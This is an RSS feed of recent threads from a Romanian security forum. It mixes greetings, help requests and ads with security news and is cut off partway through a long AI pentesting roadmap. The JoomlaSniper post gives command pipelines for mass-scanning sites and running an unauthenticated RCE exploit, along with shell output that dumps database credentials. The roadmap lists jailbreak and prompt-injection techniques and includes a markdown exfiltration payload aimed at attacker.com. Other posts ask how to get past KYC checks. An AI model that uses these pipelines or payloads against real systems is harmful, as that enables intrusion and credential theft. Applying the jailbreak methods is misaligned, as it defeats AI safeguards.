<?xml version="1.0"?>
<rss version="2.0"><channel><title>Technical Forums</title><link>https://rstforums.com/forum/rss/2-technical-forums.xml/</link><description>All technical forums</description><language>en</language><item><title>securitate android</title><link><![CDATA[https://rstforums.com/forum/topic/124223-securitate-android/?do=findComment&comment=702148]]></link><description>Ce parere aveti despre Graphene, imi ofera o securitate mai buna a telefonului, astfel ca mesajele si aplicatile sa fie in controlul meu, iar mesajele si apelurile sa nu mai poata fi ascultate?</description><pubDate>Mon, 20 Jul 2026 14:50:57 +0000</pubDate></item><item><title>WordPress Core "wp2shell" RCE flaws get public exploits, patch now</title><link><![CDATA[https://rstforums.com/forum/topic/124222-wordpress-core-wp2shell-rce-flaws-get-public-exploits-patch-now/?do=findComment&comment=702147]]></link><description>On July 17, 2026, WordPress released versions 7.0.2 and 6.9.5 and triggered a forced automatic update across all affected installations, a measure the project reserves for the most severe cases. The cause is a vulnerability chain dubbed wp2shell, which lets an attacker without credentials execute code on the server starting from a single anonymous HTTP request. No plugins are required, no special configuration is needed: a freshly downloaded, never-touched WordPress installation is enough. Less than twenty-four hours after the patch was published, fourteen repositories with exploits, scanners, and test labs had already appeared on GitHub, the most followed of which counts 44 stars and 15 forks.
 


	 
 


	Ref:
 


	 
 


	- https://www.bleepingcomputer.com/news/security/wordpress-core-wp2shell-rce-flaws-get-public-exploits-patch-now/
 


	- https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
 


	- https://pasqualepillitteri.it/en/news/8405/wp2shell-wordpress-rce-cve-2026-63030-en
 


	- https://github.com/NULL200OK/WP2Shell</description><pubDate>Sun, 19 Jul 2026 09:21:46 +0000</pubDate></item><item><title>JoomlaSniper CVE-2026-48907 10/10 CRITIC</title><link><![CDATA[https://rstforums.com/forum/topic/124220-joomlasniper-cve-2026-48907-1010-critic/?do=findComment&comment=702143]]></link><description>JoomlaSniper is a comprehensive exploitation framework for CVE-2026-48907, an unauthenticated Remote Code Execution vulnerability in the JCE (Joomla Content Editor) extension for Joomla CMS.
 


	The vulnerability allows attackers to upload arbitrary PHP files via the unauthenticated profiles.import endpoint, without any authentication. Depending on server configuration, this results in full remote code execution.
 


	 
 

# Full recon pipeline &#x2014; find Joomla sites with JCE
subfinder -d target.com -silent | \
  httpx -silent -match-string "com_jce" | \
  python3 JoomlaSniper.py -t 10 -o results.json

# Shodan export &#x2192; httpx filter &#x2192; JoomlaSniper
cat shodan_results.txt | \
  httpx -silent -path /plugins/editors/jce/jce.xml -status-code -match-code 200 | \
  awk '{print $1}' | \
  python3 JoomlaSniper.py -t 20 --silent -o rce_results.json


	 
 

   JOOMLASNIPR &#x2014; INTERACTIVE SHELL
    Target : https://target.com
    Shell  : https://target.com/tmp/jce4x2k9a.xml.php
    Vector : V1:tmp
&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;

jce@target.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

jce@target.com$ sysinfo
OS:   Linux server 5.4.0-208-generic #228-Ubuntu
User: uid=33(www-data)
CWD:  /var/www/html
PHP:  PHP 8.1.27

jce@target.com$ loot
/var/www/html/configuration.php
$user = 'joomla_db_user';
$password = 'S3cur3P@ssw0rd!';
$db = 'joomla_production';
$host = 'localhost';

jce@target.com$ funcs
shell_exec: OK
exec:       OK
system:     OK
passthru:   OK

jce@target.com$ exit
Shell session ended.</description><pubDate>Fri, 17 Jul 2026 10:53:55 +0000</pubDate></item><item><title>Salut tuturor! &#xCE;nc&#xE2;ntat s&#x103; fac parte din aceast&#x103; comunitate &#x1F1F7;&#x1F1F4;</title><link><![CDATA[https://rstforums.com/forum/topic/124210-salut-tuturor-%C3%AEnc%C3%A2ntat-s%C4%83-fac-parte-din-aceast%C4%83-comunitate-%F0%9F%87%B7%F0%9F%87%B4/?do=findComment&comment=702125]]></link><description>Salut, tuturor! 
	 
 


	Sunt bucuros s&#x103; m&#x103; al&#x103;tur acestei comunit&#x103;&#x21B;i &#x219;i sper s&#x103; cunosc oameni pasiona&#x21B;i, gata s&#x103; &#xEE;mp&#x103;rt&#x103;&#x219;easc&#x103; idei &#x219;i experien&#x21B;e valoroase.
 


	De&#x219;i nu sunt din Rom&#xE2;nia, lucrez la proiecte dedicate utilizatorilor rom&#xE2;ni &#x219;i admir comunitatea de aici pentru nivelul ridicat de cuno&#x219;tin&#x21B;e &#x219;i dorin&#x21B;a de a ajuta.
 


	Sunt interesat de SEO, dezvoltare web &#x219;i marketing digital. 
	 
	&#xCE;mi place s&#x103; &#xEE;nv&#x103;&#x21B; lucruri noi &#x219;i, &#xEE;n acela&#x219;i timp, s&#x103; contribui cu informa&#x21B;ii care pot fi utile &#x219;i altor membri.
 


	Dac&#x103; ave&#x21B;i recomand&#x103;ri pentru un nou membru sau sfaturi despre comunitate, le voi aprecia cu mare drag.
 


	V&#x103; mul&#x21B;umesc pentru primire &#x219;i v&#x103; doresc mult succes tuturor! &#x1F60A; 
	 
 


	P.S. Unul dintre proiectele la care lucrez este Verificare Rovinieta, o platform&#x103; creat&#x103; pentru a ajuta &#x219;oferii din Rom&#xE2;nia s&#x103; g&#x103;seasc&#x103; rapid informa&#x21B;ii utile despre verificarea rovinietei &#x219;i alte verific&#x103;ri auto.</description><pubDate>Thu, 09 Jul 2026 02:37:28 +0000</pubDate></item><item><title>Verificare KYC</title><link><![CDATA[https://rstforums.com/forum/topic/124186-verificare-kyc/?do=findComment&comment=702083]]></link><description>Cunoaste cineva cum se poate trece de verificare KYC cu buletinul? (In obs merge, dar nu il ia robotu)</description><pubDate>Mon, 08 Jun 2026 05:42:43 +0000</pubDate></item><item><title>Decodare telefon Sony vechi</title><link><![CDATA[https://rstforums.com/forum/topic/124180-decodare-telefon-sony-vechi/?do=findComment&comment=702073]]></link><description>Salut!
 


	Am acest telefon w910i codat in Vodafone .
 


	Nu am cablu USB pt el.
 


	as avea nevoie de codul NCK.
 


	 
 


	Imei:35155503-799913-1-40
 


	Provider ID:1200-3243
 


	 
 


	As fi recunosc&#x103;tor dac&#x103; s ar gasi o persoana ce mi ar putea genera codul.</description><pubDate>Sat, 30 May 2026 07:26:46 +0000</pubDate></item><item><title>ZA Hacker</title><link><![CDATA[https://rstforums.com/forum/topic/124178-za-hacker/?do=findComment&comment=702067]]></link><description>Hey guys, I am a Polish-South-African, I have worked in Moldova, and partied in Romania a lot. I've always seen this forum around so I finally decided to join it. Anyone who hates the Russians as much as us Polaks, it's the Romanians. So brothers in arms.
 


	 
 


	Cheers,
 


	X</description><pubDate>Tue, 26 May 2026 17:51:57 +0000</pubDate></item><item><title>Copy Fail: 732 Bytes to Root on Every Major Linux Distribution</title><link><![CDATA[https://rstforums.com/forum/topic/124145-copy-fail-732-bytes-to-root-on-every-major-linux-distribution/?do=findComment&comment=702004]]></link><description>Copy Fail (CVE-2026-31431) is a logic bug in the Linux kernel's authencesn cryptographic template. It lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system. A single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.
 


	The kernel never marks the corrupted page dirty for writeback, so the file on disk remains unchanged and ordinary on-disk checksum comparisons miss the modification. However, the page cache is what actually gets read when accessing the file, so the corrupted in-memory version is immediately visible system-wide. A local unprivileged user can turn this into root by corrupting the page cache of a setuid binary. The same primitive also crosses container boundaries because the page cache is shared across the host.
 


	This finding was AI-assisted, but began with an insight from Theori researcher Taeyang Lee, who was studying how the Linux crypto subsystem interacts with page-cache-backed data. He used Xint Code to scale his research across the entire crypto subsystem, and Copy Fail was the most critical finding in the report.
 


	 
 


	https://imgur.com/a/z2EsMAg</description><pubDate>Thu, 30 Apr 2026 09:49:27 +0000</pubDate></item><item><title>Salut</title><link><![CDATA[https://rstforums.com/forum/topic/124141-salut/?do=findComment&comment=701990]]></link><description>Ma pote ajuta cineva sa fac ceva la un Joc va rog nu degheaba</description><pubDate>Thu, 23 Apr 2026 21:45:13 +0000</pubDate></item><item><title>Pentest-Tools.com is launching weekly "Office Hours"</title><link><![CDATA[https://rstforums.com/forum/topic/124137-pentest-toolscom-is-launching-weekly-office-hours/?do=findComment&comment=701982]]></link><description><![CDATA[Am primit un email de la Pentest-Tools.com. 
	Încep sesiuni live săptămânale „Office Hours”, în fiecare miercuri.
 


	Prima sesiune: Compliance (SOC 2, ISO 27001, PCI DSS) – cum să gestionezi corect dovezile pentru audit.
 


	Host: Jan Pedersen 
	Când: Miercuri, 22 Aprilie 2026 
	Unde: Zoom
 


	Intervale: 
	Sesiunea 1: 15:00 București / 13:00 Londra / 08:00 New York 
	Sesiunea 2: 19:00 București / 17:00 Londra / 12:00 New York / 09:00 Los Angeles
 


	Ce vei învăța:
 


	
		Scanare continuă pentru audit
	
	
		Generare automată de dovezi
	
	
		Integrare cu SOC 2, ISO 27001 și PCI DSS
	



	Include demo și sesiune de întrebări.
 


	Înregistrare: 
	https://zoom.us/webinar/register/WN_pnkMFZy9Q0KezdTDeC6fdw?utm_source=newsletter&amp;utm_medium=email&amp;utm_campaign=office-hours-with-jan 
	https://zoom.us/webinar/register/WN_7er_VRcPRrebDOPnwl9f2w?utm_source=newsletter&amp;utm_medium=email&amp;utm_campaign=office-hours-with-jan]]></description><pubDate>Tue, 21 Apr 2026 04:43:13 +0000</pubDate></item><item><title>Salutare all</title><link><![CDATA[https://rstforums.com/forum/topic/124104-salutare-all/?do=findComment&comment=701921]]></link><description>Va salut am o &#xEE;ntrebare are cineva un cont de rockstar sa imi &#xEE;mprumute sa joc gta 5 online c&#xE2;teva zile max o s&#x103;pt&#x103;m&#xE2;n&#x103;</description><pubDate>Sat, 04 Apr 2026 00:33:41 +0000</pubDate></item><item><title>Open Tracker Signups, Applications, and Invites</title><link><![CDATA[https://rstforums.com/forum/topic/124081-open-tracker-signups-applications-and-invites/?do=findComment&comment=701851]]></link><description>Invitatii Trackers/Open Signups</description><pubDate>Wed, 18 Mar 2026 19:28:59 +0000</pubDate></item><item><title>Propunere schimbare ni&#x219;&#x103; pentru forum</title><link><![CDATA[https://rstforums.com/forum/topic/124079-propunere-schimbare-ni%C8%99%C4%83-pentru-forum/?do=findComment&comment=701844]]></link><description><![CDATA[Dacă tot avem atâția ani de experiență în spate și încă mai știu o gramadă de persoane de RST, ce ar fi dacă am schimba direcția forumului către automatizări, tips &amp; tricks, AI și monetizare, fără a intra vreodată în zona fraudei pe care am încercat mereu să o combatem? Am de 15 ani schițată metoda ideală de monetizare pentru RST, consider că încă este validă, și nu văd de ce nu am începe să facem bani și să îi ajutăm și pe alții să facă bani cu ajutorul nostru fără a încălca legislația. 
	 
	Admini și useri ce părere aveți? Îi dăm drumul la treabă? Ne dedicăm energia să facem o treabă serioasă care să aducă cu adevărat plus valoare, sau îi lăsăm pe toți diletanții de pe comunități ca BlackHatWorld să facă bani din mizerii, țepe și tutoriale care nu funcționează? Comunitatea RST a fost mereu corectă cu userii și nu a promovat țepe. De ce nu am face din treaba asta și din experiența noastră, a tuturor, un business din care să producem bani?]]></description><pubDate>Tue, 17 Mar 2026 16:27:46 +0000</pubDate></item><item><title>Ajutor deschidere baze de date contabile</title><link><![CDATA[https://rstforums.com/forum/topic/124077-ajutor-deschidere-baze-de-date-contabile/?do=findComment&comment=701841]]></link><description><![CDATA[Va salut! Am o situatie foarte grava in familie. Tata are o firma din 1996 unde e asociat unic, de pe care maica-mea fara niciun fel de imputernicire notariala i-a furat o gramada de marfa convingand fosta contabila ca tata e schizofrenic si convingand-o pe contabila sa nu tina legatura cu acesta, ci doar cu ea. Maica-mea si-a facut ea un alt SRL si a luat marfa de pe SRL-ul lui tata pe al ei falsificand semnatura tatalui meu in facturi si la Registrul Comertului. Am depus plangere la Politia Economica dar pare ca nu se misca nimic deocamdata.
 


	Intre timp a intentat si divort de el la judecatorie si s-a mutat la un amant.
 


	Contabila ne-a dat pe mail dosarele celor doua firme, dar nu reuseste nimeni sa le deschida ca sa vedem facturile. Evident ca acum fosta contabila nu mai raspunde la usa si telefon.  Am incercat cu SAGA si alte programe de contabilitate dar nimic. Ma poate ajuta cineva? 😌 Gratitude for you!
 


	 
 


	Atasez bazele de date: - &lt;redacted&gt;]]></description><pubDate>Mon, 16 Mar 2026 17:10:28 +0000</pubDate></item><item><title>Daca ma poate ajuta careva</title><link><![CDATA[https://rstforums.com/forum/topic/124076-daca-ma-poate-ajuta-careva/?do=findComment&comment=701835]]></link><description>salutare, am si eu un cont de steam vechi de vreo 17 ani cred, inactiv de 9,10 ani, mi am uitat parola, iar cei de la steam nu accepta da mi trimita link pentru resetare parola decat daca le trimit un cd key, eu steam ul l am cumparat prin sms cum era pe vremuri , sms , luau euro din cont si primeam condul, acum nu mai am nimic decat acces la adresa de mail</description><pubDate>Sat, 14 Mar 2026 17:58:29 +0000</pubDate></item><item><title>Vand advertoriale in aproximativ 700 site uri din romania</title><link><![CDATA[https://rstforums.com/forum/topic/124061-vand-advertoriale-in-aproximativ-700-site-uri-din-romania/?do=findComment&comment=701805]]></link><description>Vand mai multe pachete de advertoriale la pret bun, site uri cu autoritate medie, sau mare si am si o oferta f buna, advertoriale pe 107 site uri cu 2500 lei</description><pubDate>Fri, 06 Mar 2026 07:56:30 +0000</pubDate></item><item><title>Large-scale online deanonymization with LLMs</title><link><![CDATA[https://rstforums.com/forum/topic/124058-large-scale-online-deanonymization-with-llms/?do=findComment&comment=701781]]></link><description>We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identityrelevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data , our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using crossplatform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user&#x2019;s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered.
 


	 
 


	Download: https://arxiv.org/pdf/2602.16800</description><pubDate>Fri, 27 Feb 2026 14:27:32 +0000</pubDate></item><item><title>AI/ML Pentesting Roadmap</title><link><![CDATA[https://rstforums.com/forum/topic/124057-aiml-pentesting-roadmap/?do=findComment&comment=701780]]></link><description><![CDATA[🛡️ AI/ML Pentesting Roadmap
	



	
 


	
		A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner.
	 




	
		📋 Table of Contents
	



	
		Prerequisites
	
	
		Phase 1 — Foundations
	
	
		Phase 2 — AI/ML Security Concepts
	
	
		Phase 3 — Prompt Injection &amp; LLM Attacks
	
	
		Phase 4 — Hands-On Practice
	
	
		Phase 5 — Advanced Exploitation Techniques
	
	
		Phase 6 — Real-World Research &amp; Bug Bounty
	
	
		Standards, Frameworks &amp; References
	
	
		Tools &amp; Repositories
	
	
		Books, PDFs &amp; E-Books
	
	
		Video Resources
	
	
		CTF &amp; Competitions
	
	
		Bug Bounty Programs
	
	
		Community &amp; News
	
	
		Suggested Learning Path by Experience Level
	




	
		Prerequisites
	



	Before diving into AI/ML pentesting, ensure you have the following foundation:
 


	
		General Security Basics
	



	
		PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.)
	
	
		TryHackMe — Pre-Security Path
	
	
		HackTheBox Academy
	
	
		OWASP Top 10
	



	
		Programming (Python is essential)
	



	
		Python for Everybody — Coursera
	
	
		Automate the Boring Stuff with Python — Free online book
	
	
		CS50P — Python — Free Harvard course
	



	
		APIs &amp; HTTP
	



	
		Understand REST APIs, HTTP methods, headers, and authentication flows
	
	
		Postman Learning Center
	
	
		Practice with tools: curl, Burp Suite, Postman
	




	
		Phase 1 — Foundations
	



	
		1.1 Machine Learning Fundamentals
	



	
		
			
				Resource
			
			
				Type
			
			
				Cost
			
		
	
	
		
			
				Machine Learning — Andrew Ng (Coursera)
			
			
				Course
			
			
				Audit Free
			
		
		
			
				Introduction to ML — edX
			
			
				Course
			
			
				Audit Free
			
		
		
			
				fast.ai Practical Deep Learning
			
			
				Course
			
			
				Free
			
		
		
			
				Google Machine Learning Crash Course
			
			
				Course
			
			
				Free
			
		
		
			
				Kaggle ML Courses
			
			
				Course
			
			
				Free
			
		
		
			
				3Blue1Brown — Neural Networks
			
			
				Video
			
			
				Free
			
		
	



	
		1.2 Large Language Models (LLMs)
	



	Understanding how LLMs work is critical before attacking them.
 


	
		
			
				Resource
			
			
				Type
			
			
				Cost
			
		
	
	
		
			
				Andrej Karpathy — Intro to LLMs
			
			
				Video
			
			
				Free
			
		
		
			
				Andrej Karpathy — Let's build GPT
			
			
				Video
			
			
				Free
			
		
		
			
				Hugging Face NLP Course
			
			
				Course
			
			
				Free
			
		
		
			
				LLM University by Cohere
			
			
				Course
			
			
				Free
			
		
		
			
				Prompt Engineering Guide
			
			
				Guide
			
			
				Free
			
		
	




	
		Phase 2 — AI/ML Security Concepts
	



	
		2.1 Core Security Concepts
	



	
		OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities
	
	
		MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems
	
	
		NIST AI Risk Management Framework — Federal AI risk guidance
	
	
		IBM — AI Security Overview
	
	
		AI Village — LLM Threat Modeling
	
	
		Promptingguide — Adversarial Attacks
	
	
		HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI
	



	
		2.2 Attack Surface Overview
	



	Key attack vectors in AI/ML systems:
 


	
		Prompt Injection — Manipulating LLM behavior through crafted inputs
	
	
		Jailbreaking — Bypassing safety filters and guardrails
	
	
		Model Inversion — Extracting training data from a model
	
	
		Membership Inference — Determining if data was in training set
	
	
		Data Poisoning — Corrupting training data to influence behavior
	
	
		Adversarial Examples — Perturbed inputs that fool classifiers
	
	
		Model Extraction/Stealing — Cloning a model via API queries
	
	
		Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face
	
	
		Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools
	
	
		Training Data Exfiltration — Extracting memorized private data
	
	
		Denial of Service — Overloading models via crafted prompts
	



	
		2.3 MLOps &amp; Infrastructure Security
	



	
		From MLOps to MLOops — JFrog
	
	
		Offensive ML Playbook
	
	
		AI Exploits — ProtectAI
	
	
		Awesome AI Security — ottosulin
	




	
		Phase 3 — Prompt Injection &amp; LLM Attacks
	



	
		3.1 Understanding Prompt Injection
	



	
		IBM Guide on Prompt Injection
	
	
		Simon Willison's Explanation of Prompt Injection
	
	
		Learn Prompting — Prompt Hacking and Injection
	
	
		PortSwigger LLM Attacks
	
	
		NCC Group — Exploring Prompt Injection Attacks
	
	
		Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection
	



	
		3.2 Jailbreaking Techniques
	



	
		DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo
	
	
		Role-playing / Persona manipulation
	
	
		Token smuggling — Encoding instructions to bypass filters
	
	
		Prompt leaking — Extracting system prompts
	
	
		Indirect prompt injection — Attacks via documents, web content, memory
	
	
		WideOpenAI — Jailbreak Collection
	
	
		PayloadsAllTheThings — Prompt Injection
	
	
		PALLMs — Payloads for Attacking LLMs
	



	
		3.3 Indirect Prompt Injection
	



	A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes.
 


	
		Greshake — LLM Security / Not What You've Signed Up For
	
	
		Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection
	
	
		GitHub Copilot Chat: Prompt Injection to Data Exfiltration
	
	
		Google AI Studio Data Exfiltration
	



	
		3.4 Advanced Prompt Attack Techniques
	



	
		How to Persuade an LLM to Change Its System Prompt
	
	
		Bugcrowd Ultimate Guide to AI Security (PDF)
	
	
		Snyk OWASP Top 10 LLM (PDF)
	
	
		Vanna.AI Prompt Injection RCE — JFrog
	




	
		Phase 4 — Hands-On Practice
	



	
		4.1 Interactive Platforms &amp; Games
	



	
		
			
				Platform
			
			
				Description
			
			
				Link
			
		
	
	
		
			
				Gandalf
			
			
				LLM prompt testing game — extract the password
			
			
				gandalf.lakera.ai
			
		
		
			
				Prompt Airlines
			
			
				Gamified prompt injection learning
			
			
				promptairlines.com
			
		
		
			
				Crucible
			
			
				Interactive AI security challenges by Dreadnode
			
			
				crucible.dreadnode.io
			
		
		
			
				Immersive Labs AI
			
			
				Structured AI security exercises
			
			
				prompting.ai.immersivelabs.com
			
		
		
			
				Secdim AI Games
			
			
				Prompt injection games
			
			
				play.secdim.com/game/ai
			
		
		
			
				HackAPrompt
			
			
				Community prompt injection competition
			
			
				hackaprompt.com
			
		
		
			
				PortSwigger LLM Labs
			
			
				Hands-on web LLM attack labs
			
			
				Web Security Academy
			
		
	



	
		4.2 Vulnerable-by-Design Projects
	



	
		
			
				Repository
			
			
				Description
			
		
	
	
		
			
				Damn Vulnerable LLM Agent — WithSecureLabs
			
			
				Intentionally vulnerable LLM agent
			
		
		
			
				ScottLogic Prompt Injection Playground
			
			
				Local prompt injection lab
			
		
		
			
				Greshake LLM Security Tools
			
			
				Proof-of-concept attacks
			
		
	



	
		4.3 CTF Writeups to Study
	



	
		CTF Writeup — HackPack CTF 2024 LLM Edition
	
	
		LLM Pentest Writeups — System Weakness
	




	
		Phase 5 — Advanced Exploitation Techniques
	



	
		5.1 Agent &amp; Tool Integration Attacks
	



	When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically.
 


	
		LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec
	
	
		LLM Pentest: Leveraging Agent Integration For RCE (full)
	
	
		Dumping a Database with an AI Chatbot — Synack
	
	
		CSWSH Meets LLM Chatbots
	



	
		5.2 Data Exfiltration via LLMs
	



	
		Google AI Studio: LLM-Powered Data Exfiltration
	
	
		Google AI Studio Mass Data Exfil (Regression)
	
	
		Hacking Google Bard — From Prompt Injection to Data Exfiltration
	
	
		AWS Amazon Q Markdown Rendering Vulnerability
	
	
		GitHub Copilot Chat Data Exfiltration
	



	
		5.3 Account Takeover &amp; Authentication Attacks
	



	
		ChatGPT Account Takeover — Wildcard Web Cache Deception
	
	
		Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)
	
	
		Security Flaws in ChatGPT Ecosystem — Salt Security
	
	
		OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx
	



	
		5.4 XSS &amp; Web Vulnerabilities in AI Products
	



	
		XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva
	
	
		Zeroday on GitHub Copilot
	



	
		5.5 Model &amp; Infrastructure Attacks
	



	
		Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)
	
	
		From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva
	



	
		5.6 Persistent Attacks &amp; Memory Exploitation
	



	
		ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red
	



	
		5.7 Adversarial Machine Learning
	



	
		CleverHans Library — Adversarial example library
	
	
		ART (Adversarial Robustness Toolbox) — IBM
	
	
		Foolbox — Python toolbox for adversarial attacks
	




	
		Phase 6 — Real-World Research &amp; Bug Bounty
	



	
		6.1 Notable Research &amp; Disclosures
	



	
		We Hacked Google AI for $50,000 — LandH
	
	
		New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer
	
	
		Jailbreak of Meta AI (Llama 3.1) Revealing Config Details
	
	
		Bypass Instructions to Manipulate Google Bard
	
	
		My LLM Bug Bounty Journey on Hugging Face Hub
	
	
		Anonymised Penetration Test Report — Volkis
	
	
		Lakera Real World LLM Exploits (PDF)
	



	
		6.2 How to Find LLM Vulnerabilities
	



	Key areas to test when assessing an LLM-powered application:
 


	
		System prompt extraction — Can you leak the hidden system prompt?
	
	
		Instruction override — Can you ignore system-level instructions?
	
	
		Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)?
	
	
		Data exfiltration via markdown — Does the UI render ![](https://attacker.com?q=...) ?
	
	
		Persistent injection via memory — Can you inject instructions that persist in memory/RAG?
	
	
		PII leakage — Does the model reveal training data or other users' data?
	
	
		Cross-user data leakage — In multi-tenant apps, can you access other users' contexts?
	
	
		Authentication bypass — Can you trick the LLM into performing privileged actions?
	




	
		Standards, Frameworks &amp; References
	



	
		
			
				Resource
			
			
				Description
			
		
	
	
		
			
				OWASP LLM Top 10
			
			
				Top 10 LLM vulnerability classes
			
		
		
			
				MITRE ATLAS
			
			
				AI adversarial threat matrix
			
		
		
			
				NIST AI RMF
			
			
				US Federal AI risk management framework
			
		
		
			
				OWASP AI Exchange
			
			
				Cross-industry AI security guidance
			
		
		
			
				ISO/IEC 42001
			
			
				International AI management standard
			
		
		
			
				ENISA AI Threat Landscape
			
			
				EU AI threat landscape report
			
		
		
			
				Google Secure AI Framework (SAIF)
			
			
				Google's AI security framework
			
		
	




	
		Tools &amp; Repositories
	



	
		Offensive Tools
	



	
		
			
				Tool
			
			
				Purpose
			
		
	
	
		
			
				Garak
			
			
				LLM vulnerability scanner
			
		
		
			
				PyRIT
			
			
				Microsoft's Python Risk Identification Toolkit for LLMs
			
		
		
			
				LLM Fuzzer
			
			
				Fuzzing framework for LLMs
			
		
		
			
				PALLMs
			
			
				Payloads for attacking LLMs
			
		
		
			
				PromptInject
			
			
				Prompt injection attack framework
			
		
		
			
				PurpleLlama / CyberSecEval
			
			
				Meta's LLM security evaluation
			
		
	



	
		Defensive / Scanning Tools
	



	
		
			
				Tool
			
			
				Purpose
			
		
	
	
		
			
				Rebuff
			
			
				Prompt injection detection
			
		
		
			
				NeMo Guardrails
			
			
				NVIDIA guardrail framework
			
		
		
			
				Lakera Guard
			
			
				Commercial prompt injection protection
			
		
		
			
				AI Exploits — ProtectAI
			
			
				Real-world ML exploit collection
			
		
		
			
				ModelScan
			
			
				Scan ML model files for malicious code
			
		
	



	
		Reference Lists
	



	
		
			
				Resource
			
			
				Description
			
		
	
	
		
			
				Awesome LLM Security — corca-ai
			
			
				Curated LLM security list
			
		
		
			
				Awesome LLM — Hannibal046
			
			
				Everything LLM including security
			
		
		
			
				Awesome AI Security — ottosulin
			
			
				General AI security resources
			
		
		
			
				LLM Hacker's Handbook
			
			
				Comprehensive hacking handbook
			
		
		
			
				PayloadsAllTheThings — Prompt Injection
			
			
				Payload collection
			
		
		
			
				WideOpenAI
			
			
				Jailbreak and bypass collection
			
		
		
			
				Chatgpt-DAN
			
			
				DAN jailbreak collection
			
		
	




	
		Books, PDFs &amp; E-Books
	



	
		
			
				Resource
			
			
				Link
			
		
	
	
		
			
				LLM Hacker's Handbook
			
			
				GitHub
			
		
		
			
				OWASP Top 10 for LLM (Snyk)
			
			
				PDF
			
		
		
			
				Bugcrowd Ultimate Guide to AI Security
			
			
				PDF
			
		
		
			
				Lakera Real World LLM Exploits
			
			
				PDF
			
		
		
			
				HackerOne Ultimate Guide to Managing AI Risks
			
			
				E-Book
			
		
		
			
				Adversarial Machine Learning — Goodfellow et al.
			
			
				arXiv
			
		
	




	
		Video Resources
	



	
		
			
				Resource
			
			
				Link
			
		
	
	
		
			
				Penetration Testing Against and With AI/LLM/ML (Playlist)
			
			
				YouTube
			
		
		
			
				Andrej Karpathy — Intro to Large Language Models
			
			
				YouTube
			
		
		
			
				DEF CON AI Village Talks
			
			
				YouTube
			
		
		
			
				LiveOverflow — AI/ML Security
			
			
				YouTube
			
		
		
			
				3Blue1Brown — Neural Networks Series
			
			
				YouTube
			
		
		
			
				John Hammond — AI Security Challenges
			
			
				YouTube
			
		
		
			
				Cybrary — Machine Learning Security
			
			
				Cybrary
			
		
	




	
		CTF &amp; Competitions
	



	
		
			
				Competition
			
			
				Description
			
			
				Link
			
		
	
	
		
			
				Crucible
			
			
				Ongoing AI security challenges
			
			
				crucible.dreadnode.io
			
		
		
			
				HackAPrompt
			
			
				Annual prompt injection competition
			
			
				hackaprompt.com
			
		
		
			
				AI Village CTF (DEF CON)
			
			
				Annual AI security CTF at DEF CON
			
			
				aivillage.org
			
		
		
			
				Gandalf
			
			
				Self-paced LLM challenge
			
			
				gandalf.lakera.ai
			
		
		
			
				Prompt Airlines
			
			
				Gamified injection challenges
			
			
				promptairlines.com
			
		
		
			
				Hack The Box AI Challenges
			
			
				HTB AI-themed challenges
			
			
				hackthebox.com
			
		
		
			
				Secdim AI Games
			
			
				Web-based AI security games
			
			
				play.secdim.com/game/ai
			
		
	




	
		Bug Bounty Programs
	



	AI/ML security bug bounties are growing rapidly. Target these platforms:
 


	
		
			
				Program
			
			
				Scope
			
			
				Link
			
		
	
	
		
			
				OpenAI Bug Bounty
			
			
				ChatGPT, API, plugins
			
			
				bugcrowd.com/openai
			
		
		
			
				Google AI Bug Bounty
			
			
				Gemini, Bard, Vertex AI
			
			
				bughunters.google.com
			
		
		
			
				Meta AI Bug Bounty
			
			
				Llama models, Meta AI
			
			
				facebook.com/whitehat
			
		
		
			
				HuggingFace via ProtectAI
			
			
